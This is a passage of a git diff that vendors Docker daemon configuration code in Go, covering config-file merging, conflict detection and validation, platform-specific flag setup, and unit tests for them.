+		return fmt.Errorf("file configuration validation failed (%v)", err)
+	}
+
+	// Labels of the docker engine used to allow multiple values associated with the same key.
+	// This is deprecated in 1.13, and, be removed after 3 release cycles.
+	// The following will check the conflict of labels, and report a warning for deprecation.
+	//
+	// TODO: After 3 release cycles (1.16) an error will be returned, and labels will be
+	// sanitized to consolidate duplicate key-value pairs (config.Labels = newLabels):
+	//
+	// newLabels, err := GetConflictFreeLabels(newConfig.Labels)
+	// if err != nil {
+	//      return err
+	// }
+	// newConfig.Labels = newLabels
+	//
+	if _, err := GetConflictFreeLabels(newConfig.Labels); err != nil {
+		logrus.Warnf("Engine labels with duplicate keys and conflicting values have been deprecated: %s", err)
+	}
+
+	reload(newConfig)
+	return nil
+}
+
+// boolValue is an interface that boolean value flags implement
+// to tell the command line how to make -name equivalent to -name=true.
+type boolValue interface {
+	IsBoolFlag() bool
+}
+
+// MergeDaemonConfigurations reads a configuration file,
+// loads the file configuration in an isolated structure,
+// and merges the configuration provided from flags on top
+// if there are no conflicts.
+func MergeDaemonConfigurations(flagsConfig *Config, flags *pflag.FlagSet, configFile string) (*Config, error) {
+	fileConfig, err := getConflictFreeConfiguration(configFile, flags)
+	if err != nil {
+		return nil, err
+	}
+
+	if err := ValidateConfiguration(fileConfig); err != nil {
+		return nil, fmt.Errorf("file configuration validation failed (%v)", err)
+	}
+
+	// merge flags configuration on top of the file configuration
+	if err := mergo.Merge(fileConfig, flagsConfig); err != nil {
+		return nil, err
+	}
+
+	// We need to validate again once both fileConfig and flagsConfig
+	// have been merged
+	if err := ValidateConfiguration(fileConfig); err != nil {
+		return nil, fmt.Errorf("file configuration validation failed (%v)", err)
+	}
+
+	return fileConfig, nil
+}
+
+// getConflictFreeConfiguration loads the configuration from a JSON file.
+// It compares that configuration with the one provided by the flags,
+// and returns an error if there are conflicts.
+func getConflictFreeConfiguration(configFile string, flags *pflag.FlagSet) (*Config, error) {
+	b, err := ioutil.ReadFile(configFile)
+	if err != nil {
+		return nil, err
+	}
+
+	var config Config
+	var reader io.Reader
+	if flags != nil {
+		var jsonConfig map[string]interface{}
+		reader = bytes.NewReader(b)
+		if err := json.NewDecoder(reader).Decode(&jsonConfig); err != nil {
+			return nil, err
+		}
+
+		configSet := configValuesSet(jsonConfig)
+
+		if err := findConfigurationConflicts(configSet, flags); err != nil {
+			return nil, err
+		}
+
+		// Override flag values to make sure the values set in the config file with nullable values, like `false`,
+		// are not overridden by default truthy values from the flags that were not explicitly set.
+		// See https://github.com/docker/docker/issues/20289 for an example.
+		//
+		// TODO: Rewrite configuration logic to avoid same issue with other nullable values, like numbers.
+		namedOptions := make(map[string]interface{})
+		for key, value := range configSet {
+			f := flags.Lookup(key)
+			if f == nil { // ignore named flags that don't match
+				namedOptions[key] = value
+				continue
+			}
+
+			if _, ok := f.Value.(boolValue); ok {
+				f.Value.Set(fmt.Sprintf("%v", value))
+			}
+		}
+		if len(namedOptions) > 0 {
+			// set also default for mergeVal flags that are boolValue at the same time.
+			flags.VisitAll(func(f *pflag.Flag) {
+				if opt, named := f.Value.(opts.NamedOption); named {
+					v, set := namedOptions[opt.Name()]
+					_, boolean := f.Value.(boolValue)
+					if set && boolean {
+						f.Value.Set(fmt.Sprintf("%v", v))
+					}
+				}
+			})
+		}
+
+		config.valuesSet = configSet
+	}
+
+	reader = bytes.NewReader(b)
+	err = json.NewDecoder(reader).Decode(&config)
+	return &config, err
+}
+
+// configValuesSet returns the configuration values explicitly set in the file.
+func configValuesSet(config map[string]interface{}) map[string]interface{} {
+	flatten := make(map[string]interface{})
+	for k, v := range config {
+		if m, isMap := v.(map[string]interface{}); isMap && !flatOptions[k] {
+			for km, vm := range m {
+				flatten[km] = vm
+			}
+			continue
+		}
+
+		flatten[k] = v
+	}
+	return flatten
+}
+
+// findConfigurationConflicts iterates over the provided flags searching for
+// duplicated configurations and unknown keys. It returns an error with all the conflicts if
+// it finds any.
+func findConfigurationConflicts(config map[string]interface{}, flags *pflag.FlagSet) error {
+	// 1. Search keys from the file that we don't recognize as flags.
+	unknownKeys := make(map[string]interface{})
+	for key, value := range config {
+		if flag := flags.Lookup(key); flag == nil {
+			unknownKeys[key] = value
+		}
+	}
+
+	// 2. Discard values that implement NamedOption.
+	// Their configuration name differs from their flag name, like `labels` and `label`.
+	if len(unknownKeys) > 0 {
+		unknownNamedConflicts := func(f *pflag.Flag) {
+			if namedOption, ok := f.Value.(opts.NamedOption); ok {
+				if _, valid := unknownKeys[namedOption.Name()]; valid {
+					delete(unknownKeys, namedOption.Name())
+				}
+			}
+		}
+		flags.VisitAll(unknownNamedConflicts)
+	}
+
+	if len(unknownKeys) > 0 {
+		var unknown []string
+		for key := range unknownKeys {
+			unknown = append(unknown, key)
+		}
+		return fmt.Errorf("the following directives don't match any configuration option: %s", strings.Join(unknown, ", "))
+	}
+
+	var conflicts []string
+	printConflict := func(name string, flagValue, fileValue interface{}) string {
+		return fmt.Sprintf("%s: (from flag: %v, from file: %v)", name, flagValue, fileValue)
+	}
+
+	// 3. Search keys that are present as a flag and as a file option.
+	duplicatedConflicts := func(f *pflag.Flag) {
+		// search option name in the json configuration payload if the value is a named option
+		if namedOption, ok := f.Value.(opts.NamedOption); ok {
+			if optsValue, ok := config[namedOption.Name()]; ok {
+				conflicts = append(conflicts, printConflict(namedOption.Name(), f.Value.String(), optsValue))
+			}
+		} else {
+			// search flag name in the json configuration payload
+			for _, name := range []string{f.Name, f.Shorthand} {
+				if value, ok := config[name]; ok {
+					conflicts = append(conflicts, printConflict(name, f.Value.String(), value))
+					break
+				}
+			}
+		}
+	}
+
+	flags.Visit(duplicatedConflicts)
+
+	if len(conflicts) > 0 {
+		return fmt.Errorf("the following directives are specified both as a flag and in the configuration file: %s", strings.Join(conflicts, ", "))
+	}
+	return nil
+}
+
+// ValidateConfiguration validates some specific configs.
+// such as config.DNS, config.Labels, config.DNSSearch,
+// as well as config.MaxConcurrentDownloads, config.MaxConcurrentUploads.
+func ValidateConfiguration(config *Config) error {
+	// validate DNS
+	for _, dns := range config.DNS {
+		if _, err := opts.ValidateIPAddress(dns); err != nil {
+			return err
+		}
+	}
+
+	// validate DNSSearch
+	for _, dnsSearch := range config.DNSSearch {
+		if _, err := opts.ValidateDNSSearch(dnsSearch); err != nil {
+			return err
+		}
+	}
+
+	// validate Labels
+	for _, label := range config.Labels {
+		if _, err := opts.ValidateLabel(label); err != nil {
+			return err
+		}
+	}
+
+	// validate MaxConcurrentDownloads
+	if config.IsValueSet("max-concurrent-downloads") && config.MaxConcurrentDownloads != nil && *config.MaxConcurrentDownloads < 0 {
+		return fmt.Errorf("invalid max concurrent downloads: %d", *config.MaxConcurrentDownloads)
+	}
+
+	// validate MaxConcurrentUploads
+	if config.IsValueSet("max-concurrent-uploads") && config.MaxConcurrentUploads != nil && *config.MaxConcurrentUploads < 0 {
+		return fmt.Errorf("invalid max concurrent uploads: %d", *config.MaxConcurrentUploads)
+	}
+
+	// validate that "default" runtime is not reset
+	if runtimes := config.GetAllRuntimes(); len(runtimes) > 0 {
+		if _, ok := runtimes[stockRuntimeName]; ok {
+			return fmt.Errorf("runtime name '%s' is reserved", stockRuntimeName)
+		}
+	}
+
+	if defaultRuntime := config.GetDefaultRuntimeName(); defaultRuntime != "" && defaultRuntime != stockRuntimeName {
+		runtimes := config.GetAllRuntimes()
+		if _, ok := runtimes[defaultRuntime]; !ok {
+			return fmt.Errorf("specified default runtime '%s' does not exist", defaultRuntime)
+		}
+	}
+
+	return nil
+}
diff --git a/vendor/github.com/docker/docker/daemon/config_common_unix.go b/vendor/github.com/docker/docker/daemon/config_common_unix.go
new file mode 100644
index 0000000000..ab76fe7b1b
--- /dev/null
+++ b/vendor/github.com/docker/docker/daemon/config_common_unix.go
@@ -0,0 +1,90 @@
+// +build solaris linux freebsd
+
+package daemon
+
+import (
+	"net"
+
+	"github.com/docker/docker/api/types"
+	"github.com/docker/docker/opts"
+	runconfigopts "github.com/docker/docker/runconfig/opts"
+	"github.com/spf13/pflag"
+)
+
+// CommonUnixConfig defines configuration of a docker daemon that is
+// common across Unix platforms.
+type CommonUnixConfig struct {
+	ExecRoot       string                   `json:"exec-root,omitempty"`
+	ContainerdAddr string                   `json:"containerd,omitempty"`
+	Runtimes       map[string]types.Runtime `json:"runtimes,omitempty"`
+	DefaultRuntime string                   `json:"default-runtime,omitempty"`
+}
+
+type commonUnixBridgeConfig struct {
+	DefaultIP                   net.IP `json:"ip,omitempty"`
+	IP                          string `json:"bip,omitempty"`
+	DefaultGatewayIPv4          net.IP `json:"default-gateway,omitempty"`
+	DefaultGatewayIPv6          net.IP `json:"default-gateway-v6,omitempty"`
+	InterContainerCommunication bool   `json:"icc,omitempty"`
+}
+
+// InstallCommonUnixFlags adds command-line options to the top-level flag parser for
+// the current process that are common across Unix platforms.
+func (config *Config) InstallCommonUnixFlags(flags *pflag.FlagSet) {
+	config.Runtimes = make(map[string]types.Runtime)
+
+	flags.StringVarP(&config.SocketGroup, "group", "G", "docker", "Group for the unix socket")
+	flags.StringVar(&config.bridgeConfig.IP, "bip", "", "Specify network bridge IP")
+	flags.StringVarP(&config.bridgeConfig.Iface, "bridge", "b", "", "Attach containers to a network bridge")
+	flags.StringVar(&config.bridgeConfig.FixedCIDR, "fixed-cidr", "", "IPv4 subnet for fixed IPs")
+	flags.Var(opts.NewIPOpt(&config.bridgeConfig.DefaultGatewayIPv4, ""), "default-gateway", "Container default gateway IPv4 address")
+	flags.Var(opts.NewIPOpt(&config.bridgeConfig.DefaultGatewayIPv6, ""), "default-gateway-v6", "Container default gateway IPv6 address")
+	flags.BoolVar(&config.bridgeConfig.InterContainerCommunication, "icc", true, "Enable inter-container communication")
+	flags.Var(opts.NewIPOpt(&config.bridgeConfig.DefaultIP, "0.0.0.0"), "ip", "Default IP when binding container ports")
+	flags.Var(runconfigopts.NewNamedRuntimeOpt("runtimes", &config.Runtimes, stockRuntimeName), "add-runtime", "Register an additional OCI compatible runtime")
+	flags.StringVar(&config.DefaultRuntime, "default-runtime", stockRuntimeName, "Default OCI runtime for containers")
+
+}
+
+// GetRuntime returns the runtime path and arguments for a given
+// runtime name
+func (config *Config) GetRuntime(name string) *types.Runtime {
+	config.reloadLock.Lock()
+	defer config.reloadLock.Unlock()
+	if rt, ok := config.Runtimes[name]; ok {
+		return &rt
+	}
+	return nil
+}
+
+// GetDefaultRuntimeName returns the current default runtime
+func (config *Config) GetDefaultRuntimeName() string {
+	config.reloadLock.Lock()
+	rt := config.DefaultRuntime
+	config.reloadLock.Unlock()
+
+	return rt
+}
+
+// GetAllRuntimes returns a copy of the runtimes map
+func (config *Config) GetAllRuntimes() map[string]types.Runtime {
+	config.reloadLock.Lock()
+	rts := config.Runtimes
+	config.reloadLock.Unlock()
+	return rts
+}
+
+// GetExecRoot returns the user configured Exec-root
+func (config *Config) GetExecRoot() string {
+	return config.ExecRoot
+}
+
+// GetInitPath returns the configure docker-init path
+func (config *Config) GetInitPath() string {
+	config.reloadLock.Lock()
+	defer config.reloadLock.Unlock()
+	if config.InitPath != "" {
+		return config.InitPath
+	}
+	return DefaultInitBinary
+}
diff --git a/vendor/github.com/docker/docker/daemon/config_experimental.go b/vendor/github.com/docker/docker/daemon/config_experimental.go
new file mode 100644
index 0000000000..963a51e5a3
--- /dev/null
+++ b/vendor/github.com/docker/docker/daemon/config_experimental.go
@@ -0,0 +1,8 @@
+package daemon
+
+import (
+	"github.com/spf13/pflag"
+)
+
+func (config *Config) attachExperimentalFlags(cmd *pflag.FlagSet) {
+}
diff --git a/vendor/github.com/docker/docker/daemon/config_solaris.go b/vendor/github.com/docker/docker/daemon/config_solaris.go
new file mode 100644
index 0000000000..bc18ccd7e4
--- /dev/null
+++ b/vendor/github.com/docker/docker/daemon/config_solaris.go
@@ -0,0 +1,47 @@
+package daemon
+
+import (
+	"github.com/spf13/pflag"
+)
+
+var (
+	defaultPidFile = "/system/volatile/docker/docker.pid"
+	defaultGraph   = "/var/lib/docker"
+	defaultExec    = "zones"
+)
+
+// Config defines the configuration of a docker daemon.
+// These are the configuration settings that you pass
+// to the docker daemon when you launch it with say: `docker -d -e lxc`
+type Config struct {
+	CommonConfig
+
+	// These fields are common to all unix platforms.
+	CommonUnixConfig
+}
+
+// bridgeConfig stores all the bridge driver specific
+// configuration.
+type bridgeConfig struct {
+	commonBridgeConfig
+
+	// Fields below here are platform specific.
+	commonUnixBridgeConfig
+}
+
+// InstallFlags adds command-line options to the top-level flag parser for
+// the current process.
+func (config *Config) InstallFlags(flags *pflag.FlagSet) {
+	// First handle install flags which are consistent cross-platform
+	config.InstallCommonFlags(flags)
+
+	// Then install flags common to unix platforms
+	config.InstallCommonUnixFlags(flags)
+
+	// Then platform-specific install flags
+	config.attachExperimentalFlags(flags)
+}
+
+func (config *Config) isSwarmCompatible() error {
+	return nil
+}
diff --git a/vendor/github.com/docker/docker/daemon/config_test.go b/vendor/github.com/docker/docker/daemon/config_test.go
new file mode 100644
index 0000000000..90f6a1277f
--- /dev/null
+++ b/vendor/github.com/docker/docker/daemon/config_test.go
@@ -0,0 +1,229 @@
+package daemon
+
+import (
+	"io/ioutil"
+	"os"
+	"runtime"
+	"strings"
+	"testing"
+
+	"github.com/docker/docker/opts"
+	"github.com/docker/docker/pkg/testutil/assert"
+	"github.com/spf13/pflag"
+)
+
+func TestDaemonConfigurationNotFound(t *testing.T) {
+	_, err := MergeDaemonConfigurations(&Config{}, nil, "/tmp/foo-bar-baz-docker")
+	if err == nil || !os.IsNotExist(err) {
+		t.Fatalf("expected does not exist error, got %v", err)
+	}
+}
+
+func TestDaemonBrokenConfiguration(t *testing.T) {
+	f, err := ioutil.TempFile("", "docker-config-")
+	if err != nil {
+		t.Fatal(err)
+	}
+
+	configFile := f.Name()
+	f.Write([]byte(`{"Debug": tru`))
+	f.Close()
+
+	_, err = MergeDaemonConfigurations(&Config{}, nil, configFile)
+	if err == nil {
+		t.Fatalf("expected error, got %v", err)
+	}
+}
+
+func TestParseClusterAdvertiseSettings(t *testing.T) {
+	if runtime.GOOS == "solaris" {
+		t.Skip("ClusterSettings not supported on Solaris\n")
+	}
+	_, err := parseClusterAdvertiseSettings("something", "")
+	if err != errDiscoveryDisabled {
+		t.Fatalf("expected discovery disabled error, got %v\n", err)
+	}
+
+	_, err = parseClusterAdvertiseSettings("", "something")
+	if err == nil {
+		t.Fatalf("expected discovery store error, got %v\n", err)
+	}
+
+	_, err = parseClusterAdvertiseSettings("etcd", "127.0.0.1:8080")
+	if err != nil {
+		t.Fatal(err)
+	}
+}
+
+func TestFindConfigurationConflicts(t *testing.T) {
+	config := map[string]interface{}{"authorization-plugins": "foobar"}
+	flags := pflag.NewFlagSet("test", pflag.ContinueOnError)
+
+	flags.String("authorization-plugins", "", "")
+	assert.NilError(t, flags.Set("authorization-plugins", "asdf"))
+
+	assert.Error(t,
+		findConfigurationConflicts(config, flags),
+		"authorization-plugins: (from flag: asdf, from file: foobar)")
+}
+
+func TestFindConfigurationConflictsWithNamedOptions(t *testing.T) {
+	config := map[string]interface{}{"hosts": []string{"qwer"}}
+	flags := pflag.NewFlagSet("test", pflag.ContinueOnError)
+
+	var hosts []string
+	flags.VarP(opts.NewNamedListOptsRef("hosts", &hosts, opts.ValidateHost), "host", "H", "Daemon socket(s) to connect to")
+	assert.NilError(t, flags.Set("host", "tcp://127.0.0.1:4444"))
+	assert.NilError(t, flags.Set("host", "unix:///var/run/docker.sock"))
+
+	assert.Error(t, findConfigurationConflicts(config, flags), "hosts")
+}
+
+func TestDaemonConfigurationMergeConflicts(t *testing.T) {
+	f, err := ioutil.TempFile("", "docker-config-")
+	if err != nil {
+		t.Fatal(err)
+	}
+
+	configFile := f.Name()
+	f.Write([]byte(`{"debug": true}`))
+	f.Close()
+
+	flags := pflag.NewFlagSet("test", pflag.ContinueOnError)
+	flags.Bool("debug", false, "")
+	flags.Set("debug", "false")
+
+	_, err = MergeDaemonConfigurations(&Config{}, flags, configFile)
+	if err == nil {
+		t.Fatal("expected error, got nil")
+	}
+	if !strings.Contains(err.Error(), "debug") {
+		t.Fatalf("expected debug conflict, got %v", err)
+	}
+}
+
+func TestDaemonConfigurationMergeConflictsWithInnerStructs(t *testing.T) {
+	f, err := ioutil.TempFile("", "docker-config-")
+	if err != nil {
+		t.Fatal(err)
+	}
+
+	configFile := f.Name()
+	f.Write([]byte(`{"tlscacert": "/etc/certificates/ca.pem"}`))
+	f.Close()
+
+	flags := pflag.NewFlagSet("test", pflag.ContinueOnError)
+	flags.String("tlscacert", "", "")
+	flags.Set("tlscacert", "~/.docker/ca.pem")
+
+	_, err = MergeDaemonConfigurations(&Config{}, flags, configFile)
+	if err == nil {
+		t.Fatal("expected error, got nil")
+	}
+	if !strings.Contains(err.Error(), "tlscacert") {
+		t.Fatalf("expected tlscacert conflict, got %v", err)
+	}
+}
+
+func TestFindConfigurationConflictsWithUnknownKeys(t *testing.T) {
+	config := map[string]interface{}{"tls-verify": "true"}
+	flags := pflag.NewFlagSet("test", pflag.ContinueOnError)
+
+	flags.Bool("tlsverify", false, "")
+	err := findConfigurationConflicts(config, flags)
+	if err == nil {
+		t.Fatal("expected error, got nil")
+	}
+	if !strings.Contains(err.Error(), "the following directives don't match any configuration option: tls-verify") {
+		t.Fatalf("expected tls-verify conflict, got %v", err)
+	}
+}
+
+func TestFindConfigurationConflictsWithMergedValues(t *testing.T) {
+	var hosts []string
+	config := map[string]interface{}{"hosts": "tcp://127.0.0.1:2345"}
+	flags := pflag.NewFlagSet("base", pflag.ContinueOnError)
+	flags.VarP(opts.NewNamedListOptsRef("hosts", &hosts, nil), "host", "H", "")
+
+	err := findConfigurationConflicts(config, flags)
+	if err != nil {
+		t.Fatal(err)
+	}
+
+	flags.Set("host", "unix:///var/run/docker.sock")
+	err = findConfigurationConflicts(config, flags)
+	if err == nil {
+		t.Fatal("expected error, got nil")
+	}
+	if !strings.Contains(err.Error(), "hosts: (from flag: [unix:///var/run/docker.sock], from file: tcp://127.0.0.1:2345)") {
+		t.Fatalf("expected hosts conflict, got %v", err)
+	}
+}
+
+func TestValidateConfiguration(t *testing.T) {
+	c1 := &Config{
+		CommonConfig: CommonConfig{
+			Labels: []string{"one"},
+		},
+	}
+
+	err := ValidateConfiguration(c1)
+	if err == nil {
+		t.Fatal("expected error, got nil")
+	}
+
+	c2 := &Config{
+		CommonConfig: CommonConfig{
+			Labels: []string{"one=two"},
+		},
+	}
+
+	err = ValidateConfiguration(c2)
+	if err != nil {
+		t.Fatalf("expected no error, got error %v", err)
+	}
+
+	c3 := &Config{
+		CommonConfig: CommonConfig{
+			DNS: []string{"1.1.1.1"},
+		},
+	}
+
+	err = ValidateConfiguration(c3)
+	if err != nil {
+		t.Fatalf("expected no error, got error %v", err)
+	}
+
+	c4 := &Config{
+		CommonConfig: CommonConfig{
+			DNS: []string{"1.1.1.1o"},
+		},
+	}
+
+	err = ValidateConfiguration(c4)
+	if err == nil {
+		t.Fatal("expected error, got nil")
+	}
+
+	c5 := &Config{
+		CommonConfig: CommonConfig{
+			DNSSearch: []string{"a.b.c"},
+		},
+	}
+
+	err = ValidateConfiguration(c5)
+	if err != nil {
+		t.Fatalf("expected no error, got error %v", err)
+	}
+
+	c6 := &Config{
+		CommonConfig: CommonConfig{
+			DNSSearch: []string{"123456"},
+		},
+	}
+
+	err = ValidateConfiguration(c6)
+	if err == nil {
+		t.Fatal("expected error, got nil")
+	}
+}
diff --git a/vendor/github.com/docker/docker/daemon/config_unix.go b/vendor/github.com/docker/docker/daemon/config_unix.go
new file mode 100644
index 0000000000..d0957884b3
--- /dev/null
+++ b/vendor/github.com/docker/docker/daemon/config_unix.go
@@ -0,0 +1,104 @@
+// +build linux freebsd
+
+package daemon
+
+import (
+	"fmt"
+
+	runconfigopts "github.com/docker/docker/runconfig/opts"
+	units "github.com/docker/go-units"
+	"github.com/spf13/pflag"
+)
+
+var (
+	defaultPidFile  = "/var/run/docker.pid"
+	defaultGraph    = "/var/lib/docker"
+	defaultExecRoot = "/var/run/docker"
+)
+
+// Config defines the configuration of a docker daemon.
+// It includes json tags to deserialize configuration from a file
+// using the same names that the flags in the command line uses.
+type Config struct {
+	CommonConfig
+
+	// These fields are common to all unix platforms.
+	CommonUnixConfig
+
+	// Fields below here are platform specific.
+	CgroupParent         string                   `json:"cgroup-parent,omitempty"`
+	EnableSelinuxSupport bool                     `json:"selinux-enabled,omitempty"`
+	RemappedRoot         string                   `json:"userns-remap,omitempty"`
+	Ulimits              map[string]*units.Ulimit `json:"default-ulimits,omitempty"`
+	CPURealtimePeriod    int64                    `json:"cpu-rt-period,omitempty"`
+	CPURealtimeRuntime   int64                    `json:"cpu-rt-runtime,omitempty"`
+	OOMScoreAdjust       int                      `json:"oom-score-adjust,omitempty"`
+	Init                 bool                     `json:"init,omitempty"`
+	InitPath             string                   `json:"init-path,omitempty"`
+	SeccompProfile       string                   `json:"seccomp-profile,omitempty"`
+}
+
+// bridgeConfig stores all the bridge driver specific
+// configuration.
+type bridgeConfig struct {
+	commonBridgeConfig
+
+	// These fields are common to all unix platforms.
+	commonUnixBridgeConfig
+
+	// Fields below here are platform specific.
+	EnableIPv6          bool   `json:"ipv6,omitempty"`
+	EnableIPTables      bool   `json:"iptables,omitempty"`
+	EnableIPForward     bool   `json:"ip-forward,omitempty"`
+	EnableIPMasq        bool   `json:"ip-masq,omitempty"`
+	EnableUserlandProxy bool   `json:"userland-proxy,omitempty"`
+	UserlandProxyPath   string `json:"userland-proxy-path,omitempty"`
+	FixedCIDRv6         string `json:"fixed-cidr-v6,omitempty"`
+}
+
+// InstallFlags adds flags to the pflag.FlagSet to configure the daemon
+func (config *Config) InstallFlags(flags *pflag.FlagSet) {
+	// First handle install flags which are consistent cross-platform
+	config.InstallCommonFlags(flags)
+
+	// Then install flags common to unix platforms
+	config.InstallCommonUnixFlags(flags)
+
+	config.Ulimits = make(map[string]*units.Ulimit)
+
+	// Then platform-specific install flags
+	flags.BoolVar(&config.EnableSelinuxSupport, "selinux-enabled", false, "Enable selinux support")
+	flags.Var(runconfigopts.NewUlimitOpt(&config.Ulimits), "default-ulimit", "Default ulimits for containers")
+	flags.BoolVar(&config.bridgeConfig.EnableIPTables, "iptables", true, "Enable addition of iptables rules")
+	flags.BoolVar(&config.bridgeConfig.EnableIPForward, "ip-forward", true, "Enable net.ipv4.ip_forward")
+	flags.BoolVar(&config.bridgeConfig.EnableIPMasq, "ip-masq", true, "Enable IP masquerading")
+	flags.BoolVar(&config.bridgeConfig.EnableIPv6, "ipv6", false, "Enable IPv6 networking")
+	flags.StringVar(&config.ExecRoot, "exec-root", defaultExecRoot, "Root directory for execution state files")
+	flags.StringVar(&config.bridgeConfig.FixedCIDRv6, "fixed-cidr-v6", "", "IPv6 subnet for fixed IPs")
+	flags.BoolVar(&config.bridgeConfig.EnableUserlandProxy, "userland-proxy", true, "Use userland proxy for loopback traffic")
+	flags.StringVar(&config.bridgeConfig.UserlandProxyPath, "userland-proxy-path", "", "Path to the userland proxy binary")
+	flags.BoolVar(&config.EnableCors, "api-enable-cors", false, "Enable CORS headers in the Engine API, this is deprecated by --api-cors-header")
+	flags.MarkDeprecated("api-enable-cors", "Please use --api-cors-header")
+	flags.StringVar(&config.CgroupParent, "cgroup-parent", "", "Set parent cgroup for all containers")
+	flags.StringVar(&config.RemappedRoot, "userns-remap", "", "User/Group setting for user namespaces")
+	flags.StringVar(&config.ContainerdAddr, "containerd", "", "Path to containerd socket")
+	flags.BoolVar(&config.LiveRestoreEnabled, "live-restore", false, "Enable live restore of docker when containers are still running")
+	flags.IntVar(&config.OOMScoreAdjust, "oom-score-adjust", -500, "Set the oom_score_adj for the daemon")
+	flags.BoolVar(&config.Init, "init", false, "Run an init in the container to forward signals and reap processes")
+	flags.StringVar(&config.InitPath, "init-path", "", "Path to the docker-init binary")
+	flags.Int64Var(&config.CPURealtimePeriod, "cpu-rt-period", 0, "Limit the CPU real-time period in microseconds")
+	flags.Int64Var(&config.CPURealtimeRuntime, "cpu-rt-runtime", 0, "Limit the CPU real-time runtime in microseconds")
+	flags.StringVar(&config.SeccompProfile, "seccomp-profile", "", "Path to seccomp profile")
+
+	config.attachExperimentalFlags(flags)
+}
+
+func (config *Config) isSwarmCompatible() error {
+	if config.ClusterStore != "" || config.ClusterAdvertise != "" {
+		return fmt.Errorf("--cluster-store and --cluster-advertise daemon configurations are incompatible with swarm mode")
+	}
+	if config.LiveRestoreEnabled {
+		return fmt.Errorf("--live-restore daemon configuration is incompatible with swarm mode")
+	}
+	return nil
+}
diff --git a/vendor/github.com/docker/docker/daemon/config_unix_test.go b/vendor/github.com/docker/docker/daemon/config_unix_test.go
new file mode 100644
index 0000000000..86c16f57ba
--- /dev/null
+++ b/vendor/github.com/docker/docker/daemon/config_unix_test.go
@@ -0,0 +1,80 @@
+// +build !windows
+
+package daemon
+
+import (
+	"io/ioutil"
+	"testing"
+)
+
+func TestDaemonConfigurationMerge(t *testing.T) {
+	f, err := ioutil.TempFile("", "docker-config-")
+	if err != nil {
+		t.Fatal(err)
+	}
+
+	configFile := f.Name()
+
+	f.Write([]byte(`
+		{
+			"debug": true,
+			"default-ulimits": {
+				"nofile": {
+					"Name": "nofile",
+					"Hard": 2048,
+					"Soft": 1024
+				}
+			},
+			"log-opts": {
+				"tag": "test_tag"
+			}
+		}`))
+
+	f.Close()
+
+	c := &Config{
+		CommonConfig: CommonConfig{
+			AutoRestart: true,
+			LogConfig: LogConfig{
+				Type:   "syslog",
+				Config: map[string]string{"tag": "test"},
+			},
+		},
+	}
+
+	cc, err := MergeDaemonConfigurations(c, nil, configFile)
+	if err != nil {
+		t.Fatal(err)
+	}
+	if !cc.Debug {
+		t.Fatalf("expected %v, got %v\n", true, cc.Debug)
+	}
+	if !cc.AutoRestart {
+		t.Fatalf("expected %v, got %v\n", true, cc.AutoRestart)
+	}
+	if cc.LogConfig.Type != "syslog" {
+		t.Fatalf("expected syslog config, got %q\n", cc.LogConfig)
+	}
+
+	if configValue, OK := cc.LogConfig.Config["tag"]; !OK {
+		t.Fatal("expected syslog config attributes, got nil\n")
+	} else {
+		if configValue != "test_tag" {
+			t.Fatalf("expected syslog config attributes 'tag=test_tag', got 'tag=%s'\n", configValue)
+		}
+	}
+
+	if cc.Ulimits == nil {
+		t.Fatal("expected default ulimit config, got nil\n")
+	} else {
+		if _, OK := cc.Ulimits["nofile"]; OK {
+			if cc.Ulimits["nofile"].Name != "nofile" ||
+				cc.Ulimits["nofile"].Hard != 2048 ||
+				cc.Ulimits["nofile"].Soft != 1024 {
+				t.Fatalf("expected default ulimit name, hard and soft are nofile, 2048, 1024, got %s, %d, %d\n", cc.Ulimits["nofile"].Name, cc.Ulimits["nofile"].Hard, cc.Ulimits["nofile"].Soft)
+			}
+		} else {
+			t.Fatal("expected default ulimit name nofile, got nil\n")
+		}
+	}
+}
diff --git a/vendor/github.com/docker/docker/daemon/config_windows.go b/vendor/github.com/docker/docker/daemon/config_windows.go
new file mode 100644
index 0000000000..df59dcf302
--- /dev/null
+++ b/vendor/github.com/docker/docker/daemon/config_windows.go
@@ -0,0 +1,71 @@
+package daemon
+
+import (
+	"os"
+	"path/filepath"
+
+	"github.com/docker/docker/api/types"
+	"github.com/spf13/pflag"
+)
+
+var (
+	defaultPidFile string
+	defaultGraph   = filepath.Join(os.Getenv("programdata"), "docker")
+)
+
+// bridgeConfig stores all the bridge driver specific
+// configuration.
+type bridgeConfig struct {
+	commonBridgeConfig
+}
+
+// Config defines the configuration of a docker daemon.
+// These are the configuration settings that you pass
+// to the docker daemon when you launch it with say: `docker daemon -e windows`
+type Config struct {
+	CommonConfig
+
+	// Fields below here are platform specific. (There are none presently
+	// for the Windows daemon.)
+}
+
+// InstallFlags adds flags to the pflag.FlagSet to configure the daemon
+func (config *Config) InstallFlags(flags *pflag.FlagSet) {
+	// First handle install flags which are consistent cross-platform
+	config.InstallCommonFlags(flags)
+
+	// Then platform-specific install flags.
+	flags.StringVar(&config.bridgeConfig.FixedCIDR, "fixed-cidr", "", "IPv4 subnet for fixed IPs")
+	flags.StringVarP(&config.bridgeConfig.Iface, "bridge", "b", "", "Attach containers to a virtual switch")
+	flags.StringVarP(&config.SocketGroup, "group", "G", "", "Users or groups that can access the named pipe")
+}
+
+// GetRuntime returns the runtime path and arguments for a given
+// runtime name
+func (config *Config) GetRuntime(name string) *types.Runtime {
+	return nil
+}
+
+// GetInitPath returns the configure docker-init path
+func (config *Config) GetInitPath() string {
+	return ""
+}
+
+// GetDefaultRuntimeName returns the current default runtime
+func (config *Config) GetDefaultRuntimeName() string {
+	return stockRuntimeName
+}
+
+// GetAllRuntimes returns a copy of the runtimes map
+func (config *Config) GetAllRuntimes() map[string]types.Runtime {
+	return map[string]types.Runtime{}
+}
+
+// GetExecRoot returns the user configured Exec-root
+func (config *Config) GetExecRoot() string {
+	return ""
+}
+
+func (config *Config) isSwarmCompatible() error {
+	return nil
+}
diff --git a/vendor/github.com/docker/docker/daemon/config_windows_test.go b/vendor/github.com/docker/docker/daemon/config_windows_test.go
new file mode 100644
index 0000000000..4a7b95c17d
--- /dev/null
+++ b/vendor/github.com/docker/docker/daemon/config_windows_test.go
@@ -0,0 +1,59 @@
+// +build windows
+
+package daemon
+
+import (
+	"io/ioutil"
+	"testing"
+)
+
+func TestDaemonConfigurationMerge(t *testing.T) {
+	f, err := ioutil.TempFile("", "docker-config-")
+	if err != nil {
+		t.Fatal(err)
+	}
+
+	configFile := f.Name()
+
+	f.Write([]byte(`
+		{
+			"debug": true,
+			"log-opts": {
+				"tag": "test_tag"
+			}
+		}`))
+
+	f.Close()
+
+	c := &Config{
+		CommonConfig: CommonConfig{
+			AutoRestart: true,
